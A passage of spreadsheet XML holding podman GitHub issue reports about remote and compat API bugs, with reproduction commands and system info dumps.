",\"fedora:latest\",\"true\"],\"Umask\":\"0022\",\"Timeout\":0,\"StopTimeout\":10,\"Passwd\":true,\"sdNotifyMode\":\"container\"},\"HostConfig\":{\"Binds\":[],\"CgroupManager\":\"systemd\",\ "CgroupMode\":\"private\",\"ContainerIDFile\":\"/var/tmp/cidfile\",\"LogConfig\":{\"Type\":\"journald\",\"Config\":null,\"Path\":\"\",\"Tag\":\"\",\"Size\":\"0B\"},\"NetworkMode\":\"pasta\", \"PortBindings\":{},\"RestartPolicy\":{\"Name\":\"no\",\"MaximumRetryCount\":0},\"AutoRemove\":false,\"Annotations\":{\"io.podman.annotations.cid-file\":\"/var/tmp/cidfile\"},\"VolumeDriver\ ":\"\",\"VolumesFrom\":null,\"CapAdd\":[],\"CapDrop\":[],\"Dns\":[],\"DnsOptions\":[],\"DnsSearch\":[],\"ExtraHosts\":[],\"GroupAdd\":[],\"IpcMode\":\"shareable\",\"Cgroup\":\"\",\"Cgroups\" :\"default\",\"Links\":null,\"OomScoreAdj\":0,\"PidMode\":\"private\",\"Privileged\":false,\"PublishAllPorts\":false,\"ReadonlyRootfs\":false,\"SecurityOpt\":[],\"Tmpfs\":{},\"UTSMode\":\"pr ivate\",\"UsernsMode\":\"\",\"ShmSize\":65536000,\"Runtime\":\"oci\",\"ConsoleSize\":[0,0],\"Isolation\":\"\",\"CpuShares\":0,\"Memory\":0,\"NanoCpus\":0,\"CgroupParent\":\"user.slice\",\"Bl kioWeight\":0,\"BlkioWeightDevice\":null,\"BlkioDeviceReadBps\":null,\"BlkioDeviceWriteBps\":null,\"BlkioDeviceReadIOps\":null,\"BlkioDeviceWriteIOps\":null,\"CpuPeriod\":0,\"CpuQuota\":0,\" CpuRealtimePeriod\":0,\"CpuRealtimeRuntime\":0,\"CpusetCpus\":\"\",\"CpusetMems\":\"\",\"Devices\":[],\"DiskQuota\":0,\"KernelMemory\":0,\"MemoryReservation\":0,\"MemorySwap\":0,\"MemorySwap piness\":0,\"OomKillDisable\":false,\"PidsLimit\":2048,\"Ulimits\":[],\"CpuCount\":0,\"CpuPercent\":0,\"IOMaximumIOps\":0,\"IOMaximumBandwidth\":0,\"CgroupConf\":null}}\n": json: cannot unma rshal string into Go struct field InspectContainerConfig.Config.StopSignal of type uint   Describe the results you expected Command should work  podman info output yaml $ podman -v podman version 5.1.0-dev-63ab9275b   $ cat /etc/fedora-release Fedora Asahi Remix release 39 (Thirty Nine)   $ uname -a Linux applem1 6.8.8-400.asahi.fc39.aarch64+16k #1 SMP PREEMPT_DYNAMIC Tue Apr 30 02:30:34 UTC 2024 aarch64 GNU/Linux    Podman in a container Yes  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details _No response_  Additional information I am aware that I am running this on `aarch64` did not try to run it on `x86_64` or other architectures yet.</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/22986</t>
  </si>
  <si>
    <t>remote: pod top -eo invalid: unmarshalling error</t>
  </si>
  <si>
    <t xml:space="preserve">console $ bin/podman-remote run -d --pod new:foo quay.io/libpod/testimage:20240123 top b829985a6ffa9e8aa35114e48e44e1814469ddf8a801bc77bc3141d7c1065e47 $ bin/podman-remote pod top foo -eo bar Error: unmarshalling into &amp;handlers.PodTopOKBody{ContainerTopOKBody:container.ContainerTopOKBody{Processes:[][]string(nil), Titles:[]string(nil)}}, data "": unexpected end of JSON input </t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/22989</t>
  </si>
  <si>
    <t>remote: pod start empty pod: error without message</t>
  </si>
  <si>
    <t xml:space="preserve">console $ bin/podman-remote pod create --infra=false --name=foo a0cb944bf836e95ca0a83f98e1af151879552ac4fc424e29031c5f214227bdf6 $ bin/podman-remote pod start foo Error:  (That's it. Just "Error colon space"). The expected error message (from podman-local) is:  Error: no containers in pod a0cb944bf836e95ca0a83f98e1af151879552ac4fc424e29031c5f214227bdf6 have no dependencies, cannot start pod: no such container </t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/23163</t>
  </si>
  <si>
    <t>Podman manifest inspect does not display remote annotations</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description Related to [discussions in thread](https://github.com/containers/podman/discussions/23140) If you run `podman manifest inspect quay.io/giuseppe/zstd-chunked:fedora-manifest` on any remote manifest, you are unable to see the annotations which were added to the zstd:chunked manifest. Compare the output of the following commands:  $ skopeo inspect --raw docker://quay.io/giuseppe/zstd-chunked:fedora-manifest | jq .   $ podman manifest inspect quay.io/giuseppe/zstd-chunked:fedora-manifest   Steps to reproduce the issue See above. 1. Push a manifest containing an image with annotations to any remote registry 2. Run `podman manifest inspect` on the local manifest (and see annotations) 3. Run `podman manifest inspect` on the remote manifest (and see no annotations)  Describe the results you received As above  Describe the results you expected I would expect `podman manifest inspect` to show all annotations on the manifests, since an annotation is a requirement for zstd images. When running `skopeo inspect --raw`, we can see the annotations, so I expected Podman to return the same.  podman info output yaml host: arch: amd64 buildahVersion: 1.36.0 cgroupControllers: - cpu - io - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.10-1.fc40.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.10, commit: ' cpuUtilization: idlePercent: 96.86 systemPercent: 1.56 userPercent: 1.58 cpus: 24 databaseBackend: sqlite distribution: distribution: fedora variant: silverblue version: "40" eventLogger: journald freeLocks: 2045 hostname: fedora idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 524288 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 524288 size: 65536 kernel: 6.8.11-300.fc40.x86_64 linkmode: dynamic logDriver: journald memFree: 13290414080 memTotal: 33364271104 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.11.0-1.fc40.x86_64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.11.0 package: netavark-1.11.0-1.fc40.x86_64 path: /usr/libexec/podman/netavark version: netavark 1.11.0 ociRuntime: name: crun package: crun-1.15-1.fc40.x86_64 path: /usr/bin/crun version: |- crun version 1.15 commit: e6eacaf4034e84185fd8780ac9262bbf57082278 rundir: /run/user/1000/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt-0^20240624.g1ee2eca-1.fc40.x86_64 version: | pasta 0^20240624.g1ee2eca-1.fc40.x86_64 Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: false path: /run/user/1000/podman/podman.sock rootlessNetworkCmd: pasta security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.2-2.fc40.x86_64 version: |- slirp4netns version 1.2.2 commit: 0ee2d87523e906518d34a6b423271e4826f71faf libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.5 swapFree: 8589930496 swapTotal: 8589930496 uptime: 2h 16m 4.00s (Approximately 0.08 days) variant: "" plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: ghcr.io/rsturla: Blocked: false Insecure: false Location: ghcr.io/rsturla MirrorByDigestOnly: false Mirrors: - Insecure: true Location: localhost:5000/rsturla PullFromMirror: "" Prefix: ghcr.io/rsturla PullFromMirror: "" localhost:5000: Blocked: false Insecure: true Location: localhost:5000 MirrorByDigestOnly: false Mirrors: null Prefix: localhost:5000 PullFromMirror: "" search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io store: configFile: /var/home/admin/.config/containers/storage.conf containerStore: number: 1 paused: 0 running: 0 stopped: 1 graphDriverName: overlay graphOptions: {} graphRoot: /var/home/admin/.local/share/containers/storage graphRootAllocated: 1998678130688 graphRootUsed: 285504368640 graphStatus: Backing Filesystem: btrfs Native Overlay Diff: "true" Supports d_type: "true" Supports shifting: "false" Supports volatile: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 9 runRoot: /run/user/1000/containers transientStore: false volumePath: /var/home/admin/.local/share/containers/storage/volumes version: APIVersion: 5.1.1 Built: 1717459200 BuiltTime: Tue Jun 4 01:00:00 2024 GitCommit: "" GoVersion: go1.22.3 Os: linux OsArch: linux/amd64 Version: 5.1.1   Podman in a container No  Privileged Or Rootless None  Upstream Latest Release Yes  Additional environment details N/A  Additional information N/A</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/23712</t>
  </si>
  <si>
    <t>Compat API endpoints for events and container logs with `follow=true` do not send response immediately like Docker</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description It seems that the Podman compat API does not immediately return an HTTP response when querying `/events` or `/containers/${id}/logs?follow=true&amp;stdout=true&amp;stderr=true` if no events or logs are produced yet. In this case, the client cannot determine whether the request was successful until some data is received. For example, I use [Vector](https://github.com/vectordotdev/vector), which in turn uses the [Bollard](https://github.com/fussybeaver/bollard) library to interact with the Docker API, to collect logs from Docker and Podman. When Vector starts fetching system events and container logs using the Podman 5.2.1 compat API via the socket `unix:run/podman/podman.sock`, the requests fail with error `RequestTimeoutError` after a 2 minute timeout if no response is received from Podman, causing Vector to stop monitoring the container. At the same time, everything works fine with Docker. Vector logs:  vector[19350]: 2024-08-21T17:05:19.072757Z INFO source{component_kind="source" component_id=src_podman component_type=docker_logs}: vector::sources::docker_logs: Capturing logs from now on. now=2024-08-21T17:05:19.072742638+00:00 vector[19350]: 2024-08-21T17:05:19.072925Z INFO source{component_kind="source" component_id=src_podman component_type=docker_logs}: vector::sources::docker_logs: Listening to docker log events. vector[19350]: 2024-08-21T17:05:19.114233Z INFO source{component_kind="source" component_id=src_podman component_type=docker_logs}: vector::internal_events::docker_logs: Started watching for container logs. container_id=6c7b2459bcb71617e192003e88955527b738bb20dc4b6b5cbbc798112b45b357 vector[19350]: 2024-08-21T17:07:19.098385Z ERROR source{component_kind="source" component_id=src_podman component_type=docker_logs}: vector::internal_events::docker_logs: Error in communication with Docker daemon. error=RequestTimeoutError error_type="connection_failed" stage="receiving" container_id=None internal_log_rate_limit=true vector[19350]: 2024-08-21T17:07:19.115508Z ERROR source{component_kind="source" component_id=src_podman component_type=docker_logs}: vector::internal_events::docker_logs: Internal log [Error in communication with Docker daemon.] is being suppressed to avoid flooding. vector[19350]: 2024-08-21T17:07:19.115597Z INFO source{component_kind="source" component_id=src_podman component_type=docker_logs}: vector::internal_events::docker_logs: Stopped watching for container logs. container_id=6c7b2459bcb71617e192003e88955527b738bb20dc4b6b5cbbc798112b45b357   Steps to reproduce the issue 1. Run any container that does not produce logs: `id=$(podman run -d --rm alpine sleep infinity)` 2. Get events: `curl -v --unix-socket /run/podman/podman.sock "http://d/events" -o -` 3. Get container logs: `curl -v --unix-socket /run/podman/podman.sock "http://d/containers/${id}/logs?follow=true&amp;stdout=true&amp;stderr=true" -o -`  Describe the results you received There is no HTTP response if no events or logs are produced:  # curl -v --unix-socket /run/podman/podman.sock "http://d/events" -o - * Trying /run/podman/podman.sock:0 * Connected to d (/run/podman/podman.sock) port 80 &gt; GET /events HTTP/1.1 &gt; Host: d &gt; User-Agent: curl/8.6.0 &gt; Accept: */* &gt; ^C # curl -v --unix-socket /run/podman/podman.sock "http://d/containers/${id}/logs?follow=true&amp;stdout=true&amp;stderr=true" -o - * Trying /run/podman/podman.sock:0 * Connected to d (/run/podman/podman.sock) port 80 &gt; GET /containers/6c7b2459bcb71617e192003e88955527b738bb20dc4b6b5cbbc798112b45b357/logs?follow=true&amp;stdout=true&amp;stderr=true HTTP/1.1 &gt; Host: d &gt; User-Agent: curl/8.6.0 &gt; Accept: */* &gt; ^C   Describe the results you expected  For events endpoint Receive the HTTP response even if there are no logs or events. Like with Podman 5.0.3:  # curl -v --unix-socket /run/podman/podman.sock "http://d/events" -o - * Trying /run/podman/podman.sock:0 * Connected to d (/run/podman/podman.sock) port 80 &gt; GET /events HTTP/1.1 &gt; Host: d &gt; User-Agent: curl/8.6.0 &gt; Accept: */* &gt; &lt; HTTP/1.1 200 OK &lt; Api-Version: 1.41 &lt; Content-Type: application/json &lt; Libpod-Api-Version: 5.0.3 &lt; Server: Libpod/5.0.3 (linux) &lt; X-Reference-Id: 0xc00006a338 &lt; Date: Wed, 21 Aug 2024 19:16:59 GMT &lt; Transfer-Encoding: chunked &lt; ^C  Like with Docker:  # curl -v --unix-socket /run/docker.sock "http://d/events" -o - * Trying /run/docker.sock:0 * Connected to d (/run/docker.sock) port 80 &gt; GET /events HTTP/1.1 &gt; Host: d &gt; User-Agent: curl/8.6.0 &gt; Accept: */* &gt; &lt; HTTP/1.1 200 OK &lt; Api-Version: 1.46 &lt; Content-Type: application/json &lt; Docker-Experimental: false &lt; Ostype: linux &lt; Server: Docker/27.1.2 (linux) &lt; Date: Wed, 21 Aug 2024 20:08:13 GMT &lt; Transfer-Encoding: chunked &lt; ^C   For container logs endpoint Recevice the HTTP response even if there are no logs or events. Like with Docker:  # curl -v --unix-socket /run/docker.sock "http://d/containers/${id}/logs?follow=true&amp;stdout=true&amp;stderr=true" -o - * Trying /run/docker.sock:0 * Connected to d (/run/docker.sock) port 80 &gt; GET /containers/c60d242591740394e4ef8f2dd9a4264a931dffd9f357d0adb2b1e53dd0024196/logs?follow=true&amp;stdout=true&amp;stderr=true HTTP/1.1 &gt; Host: d &gt; User-Agent: curl/8.6.0 &gt; Accept: */* &gt; &lt; HTTP/1.1 200 OK &lt; Api-Version: 1.46 &lt; Content-Type: application/vnd.docker.multiplexed-stream &lt; Docker-Experimental: false &lt; Ostype: linux &lt; Server: Docker/27.1.2 (linux) &lt; Date: Wed, 21 Aug 2024 20:10:30 GMT &lt; Transfer-Encoding: chunked &lt; ^C   podman info output yaml host: arch: amd64 buildahVersion: 1.37.1 cgroupControllers: - cpuset - cpu - io - memory - hugetlb - pids cgroupManager: cgroupfs cgroupVersion: v2 conmon: package: conmon-2.1.10-1.fc40.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.10, commit: ' cpuUtilization: idlePercent: 99.44 systemPercent: 0.27 userPercent: 0.29 cpus: 2 databaseBackend: sqlite distribution: distribution: fedora variant: container version: "40" eventLogger: file freeLocks: 2048 hostname: 2659a687fd77 idMappings: gidmap: null uidmap: null kernel: 5.15.0-208.159.3.2.el9uek.x86_64 linkmode: dynamic logDriver: k8s-file memFree: 1310531584 memTotal: 3624329216 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.12.1-1.fc40.x86_64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.12.1 package: netavark-1.12.1-1.fc40.x86_64 path: /usr/libexec/podman/netavark version: netavark 1.12.1 ociRuntime: name: crun package: crun-1.15-1.fc40.x86_64 path: /usr/bin/crun version: |- crun version 1.15 commit: e6eacaf4034e84185fd8780ac9262bbf57082278 rundir: /run/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt-0^20240814.g61c0b0d-1.fc40.x86_64 version: | pasta 0^20240814.g61c0b0d-1.fc40.x86_64-pasta Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: false path: /run/podman/podman.sock rootlessNetworkCmd: pasta security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: "" package: "" version: "" swapFree: 2147479552 swapTotal: 2147479552 uptime: 27h 22m 32.00s (Approximately 1.12 days) variant: "" plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io store: configFile: /etc/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: overlay.imagestore: /usr/lib/containers/storage overlay.mount_program: Executable: /usr/bin/fuse-overlayfs Package: fuse-overlayfs-1.13-1.fc40.x86_64 Version: |- fusermount3 version: 3.16.2 fuse-overlayfs: version 1.13-dev FUSE library version 3.16.2 using FUSE kernel interface version 7.38 overlay.mountopt: nodev,fsync=0 graphRoot: /var/lib/containers/storage graphRootAllocated: 21027463168 graphRootUsed: 10851258368 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "false" Supports d_type: "true" Supports shifting: "true" Supports volatile: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 0 runRoot: /run/containers/storage transientStore: false volumePath: /var/lib/containers/storage/volumes version: APIVersion: 5.2.1 Built: 1723593600 BuiltTime: Wed Aug 14 00:00:00 2024 GitCommit: "" GoVersion: go1.22.5 Os: linux OsArch: linux/amd64 Version: 5.2.1   Podman in a container Yes  Privileged Or Rootless Privileged  Upstream Latest Release Yes  Additional environment details Additional environment details  Additional information Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/23981</t>
  </si>
  <si>
    <t>Processes top api service incompatibility</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description Describe your issue The compat endpoints do not behave the same - Api docs of docker &lt;https://docs.docker.com/reference/api/engine/version/v1.39/#tag/Container/operation/ContainerTop&gt; - Api docs of podman &lt;https://docs.podman.io/en/latest/_static/api.html#tag/containers-(compat)/operation/ContainerTop&gt;  Steps to reproduce the issue Steps to reproduce the issue 1. Get processes list using libpod compat endpoint 2. Get processes list using docker api engine endpoint 3. Compare  Describe the results you received Describe the results you received Received a list of strings  Describe the results you expected Describe the results you expected Receive a list of lists of strings  podman info output yaml Podman is working fine on 5.2.2   Podman in a container No  Privileged Or Rootless None  Upstream Latest Release Yes  Additional environment details It happens on any environment  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/24152</t>
  </si>
  <si>
    <t>podman info fails: Error: parse "[::]:2376": first path segment in URL cannot contain colon</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description Running `podman info` remote via TCP fails with: Error: parse "[::]:2376": first path segment in URL cannot contain colon The HTTP request is:  GET /v5.2.3/libpod/info HTTP/1.1 Host: d User-Agent: Go-http-client/1.1  The response is:  HTTP/1.1 500 Internal Server Error Api-Version: 1.41 Content-Type: application/json Libpod-Api-Version: 5.2.3 Server: Libpod/5.2.3 (linux) X-Reference-Id: 0xc000630010 Date: Thu, 03 Oct 2024 18:01:27 GMT Content-Length: 154 {"cause":"first path segment in URL cannot contain colon","message":"parse \"[::]:2376\": first path segment in URL cannot contain colon","response":500}   Steps to reproduce the issue Steps to reproduce the issue 1. Make podman listen on TCP via systemd socket activation. Aka append the `podman.socket` unit with  [Socket] ListenStream= ListenStream=2376  2. Execute HTTP request with `echo "GET /v5.2.3/libpod/info HTTP/1.1\nHost: d\n\n" | nc -C localhost 2376`  Describe the results you received HTTP 500 and error `parse "[::]:2376": first path segment in URL cannot contain colon`  Describe the results you expected A proper info result.  podman info output yaml The request `podman info` does itself fail. * Debian 13 * Podman 5.2.3   Podman in a container No  Privileged Or Rootless Privileged  Upstream Latest Release No  Additional environment details Additional environment details  Additional information Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/24632</t>
  </si>
  <si>
    <t>stats API endpoint crashing 500 when container has no cgroup</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description hello! I found a surprising behavior via use of the podman-exporter to report metrics. In creating a pod via `kube play`, the pod is created fine, but the metrics endpoint is failing with 500:  curl -s localhost:5000/v5.2.5/libpod/containers/stats Request Failed(Internal Server Error): cannot run top on container 0c72.. as it did not create a cgroup: this container does not have a cgroup  error logged:  GET /v5.2.5/libpod/containers/stats?all=false&amp;interval=1&amp;stream=false HTTP/1.1" 500 239 "" "Go-http-client/1.1"  Here the container `0c72..` is a pause container. I would not expect the endpoint to crash 500 and deny all stat info. Notably podman is rootless mode and in k8s (ie like DnD). Not seeing the problem in native host mode. Unclear if `containers.conf` is the source of problem. Have not had time to extensively rtfm there, but a latest attempt looked like this (largely inherited from /etc version found at https://quay.io/repository/containers/podman)  [containers] netns="host" userns="host" ipcns="host" utsns="host" cgroupns="host" cgroups="disabled" log_driver = "k8s-file" volumes = [ "/proc:/proc", ] default_sysctls = [] [engine] cgroup_manager = "cgroupfs" events_logger="file" runtime="crun"  Version info  $ podman version Client: Podman Engine Version: 5.2.5 API Version: 5.2.5 Go Version: go1.23.2 Built: Fri Oct 18 00:00:00 2024 OS/Arch: linux/amd64 </t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/24886</t>
  </si>
  <si>
    <t>Podman REST API /libpod/containers/create "r_limits" is type integer &lt;uint64&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description https://docs.podman.io/en/latest/_static/api.html#tag/containers/operation/ContainerCreateLibpod r_limits hard integer &lt;uint64&gt; Hard is the hard limit for the specified type soft integer &lt;uint64&gt; Soft is the soft limit for the specified type There is no direct reference to Ulimits. https://github.com/containers/podman/pull/19879 In PR 19879 Podman added support for passing Ulimits as -1 to mean min / max  Steps to reproduce the issue /podman-py containers_create https://github.com/containers/podman-py/blob/main/podman/domain/containers_create.py  for item in args.pop("ulimits", []): params["r_limits"].append( { "type": item["Name"], "hard": item["Hard"], "soft": item["Soft"], } )  Code Example `client.containers.create(image=img, command=['/bin/bash'], ulimits=[{"Name": "memlock", "Soft": -1, "Hard": -1}])`  Describe the results you received `podman.errors.exceptions.APIError: 500 Server Error: Internal Server Error (decode(): json: cannot unmarshal number -1 into Go struct field POSIXRlimit.r_limits.hard of type uint64)`  Describe the results you expected Expected successful creation of container with memlock min/max set to maximum values.  podman info output yaml [root@omitted]# podman info host: arch: amd64 buildahVersion: 1.33.11 cgroupControllers: - cpuset - cpu - cpuacct - blkio - memory - devices - freezer - net_cls - perf_event - net_prio - hugetlb - pids - rdma cgroupManager: systemd cgroupVersion: v1 conmon: package: conmon-2.1.10-1.module+el8.10.0+90449+0b7c8529.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.10, commit: 753128cb76d643886a978dba99fab8017289372d' cpuUtilization: idlePercent: 99.97 systemPercent: 0.01 userPercent: 0.02 cpus: 56 databaseBackend: sqlite distribution: distribution: ol variant: server version: "8.3" eventLogger: file freeLocks: 2047 hostname: omitted idMappings: gidmap: null uidmap: null kernel: 5.4.17-2011.7.4.el8uek.x86_64 linkmode: dynamic logDriver: k8s-file memFree: 142581444608 memTotal: 200959377408 networkBackend: cni networkBackendInfo: backend: cni dns: package: podman-plugins-4.9.4-18.0.1.module+el8.10.0+90449+0b7c8529.x86_64 path: /usr/libexec/cni/dnsname version: |- CNI dnsname plugin version: 1.4.0-dev commit: unknown CNI protocol versions supported: 0.1.0, 0.2.0, 0.3.0, 0.3.1, 0.4.0, 1.0.0 package: containernetworking-plugins-1.4.0-5.module+el8.10.0+90449+0b7c8529.x86_64 path: /usr/libexec/cni ociRuntime: name: runc package: runc-1.1.12-5.module+el8.10.0+90449+0b7c8529.x86_64 path: /usr/bin/runc version: |- runc version 1.1.12 spec: 1.0.2-dev go: go1.22.7 (Red Hat 1.22.7-1.module+el8.10.0+90426+810ab996) libseccomp: 2.5.2 os: linux pasta: executable: "" package: "" version: "" remoteSocket: exists: true path: /run/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_NET_RAW,CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /bin/slirp4netns package: slirp4netns-1.2.0-2.module+el8.8.0+21045+adcb6a64.x86_64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.4.0 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.2 swapFree: 4294963200 swapTotal: 4294963200 uptime: 1341h 26m 16.00s (Approximately 55.88 days) variant: "" plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - container-registry.oracle.com - docker.io store: configFile: /etc/containers/storage.conf containerStore: number: 1 paused: 0 running: 1 stopped: 0 graphDriverName: overlay graphOptions: overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphRootAllocated: 75125227520 graphRootUsed: 63892619264 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "false" Supports d_type: "true" Supports shifting: "false" Supports volatile: "false" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 33 runRoot: /run/containers/storage transientStore: false volumePath: /var/lib/containers/storage/volumes version: APIVersion: 4.9.4-rhel Built: 1732729681 BuiltTime: Wed Nov 27 17:48:01 2024 GitCommit: "" GoVersion: go1.22.7 (Red Hat 1.22.7-1.module+el8.10.0+90426+810ab996) Os: linux OsArch: linux/amd64 Version: 4.9.4-rhel   Podman in a container Yes  Privileged Or Rootless Privileged  Upstream Latest Release Yes  Additional environment details Additional environment details  Additional information Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/24910</t>
  </si>
  <si>
    <t>Container inspect endpoint is not Docker-API compatible</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description I am currently playing with `podman compose` utilizing the upstream `docker-compose` as backend. It always recreates the container because the network config is not as it should be. I added some debug prints to the `docker-compose` code and it cannot match the networks because the `NetworkID` returned by podman is wrong. Running something along the lines of `podman inspect 4cb3ce78cde3 --format="{{ json .NetworkSettings.Networks }}"|jq` returns: json { "tmp_default": { "EndpointID": "", "Gateway": "10.89.0.1", "IPAddress": "10.89.0.3", "IPPrefixLen": 24, "IPv6Gateway": "", "GlobalIPv6Address": "", "GlobalIPv6PrefixLen": 0, "MacAddress": "c2:79:d5:75:e5:09", "NetworkID": "tmp_default", "DriverOpts": null, "IPAMConfig": null, "Links": null, "Aliases": [ "tmp-traefik-1", "traefik", "4cb3ce78cde3" ] } }  Here we can see that `NetworkID` is the network name and not the id of the network (`podman network inspect tmp_default`): json [ { "name": "tmp_default", "id": "675bea81a6d49e9f1ae909c58a2269524a9a9c910f91bce12a85b05b882ab5cb", "driver": "bridge", "network_interface": "podman1", "created": "2024-12-28T20:54:28.320995381+01:00", "subnets": [ { "subnet": "10.89.0.0/24", "gateway": "10.89.0.1" } ], "ipv6_enabled": false, "internal": false, "dns_enabled": true, "labels": { "com.docker.compose.config-hash": "4bd7e5f2ecc11ab238c4eb5931f77d1e2196619bcc8daeeb80428562a7210c37", "com.docker.compose.network": "default", "com.docker.compose.project": "tmp", "com.docker.compose.version": "2.32.1" }, "options": { "isolate": "true" }, "ipam_options": { "driver": "host-local" }, "containers": { "4cb3ce78cde33f763bdd6abe5b19a5d93f5bb30043c94fa489114a48da5d4290": { "name": "tmp-traefik-1", "interfaces": { "eth0": { "subnets": [ { "ipnet": "10.89.0.3/24", "gateway": "10.89.0.1" } ], "mac_address": "c2:79:d5:75:e5:09" } } } } } ]   Steps to reproduce the issue Steps to reproduce the issue 1. `podman run --rm -it --name testing ubuntu:latest sleep infinity` 2. `podman inspect testing --format="{{ json .NetworkSettings.Networks.podman }}"|jq` 3. Observe that the `NetworkID` is the network name  Describe the results you received I would have expected the actual `NetworkID` to be shown  Describe the results you expected The network name is shown as ID  podman info output yaml host: arch: amd64 buildahVersion: 1.38.0 cgroupControllers: - cpuset - cpu - io - memory - hugetlb - pids - rdma - misc cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.12-3.fc41.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.12, commit: ' cpuUtilization: idlePercent: 97.27 systemPercent: 0.8 userPercent: 1.93 cpus: 16 databaseBackend: sqlite distribution: distribution: fedora variant: workstation version: "41" eventLogger: journald freeLocks: 2046 hostname: apollo13 idMappings: gidmap: null uidmap: null kernel: 6.12.4-200.fc41.x86_64 linkmode: dynamic logDriver: journald memFree: 6023499776 memTotal: 32395685888 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.13.1-1.fc41.x86_64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.13.1 package: netavark-1.13.1-1.fc41.x86_64 path: /usr/libexec/podman/netavark version: netavark 1.13.1 ociRuntime: name: crun package: crun-1.19.1-1.fc41.x86_64 path: /usr/bin/crun version: |- crun version 1.19.1 commit: 3e32a70c93f5aa5fea69b50256cca7fd4aa23c80 rundir: /run/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: 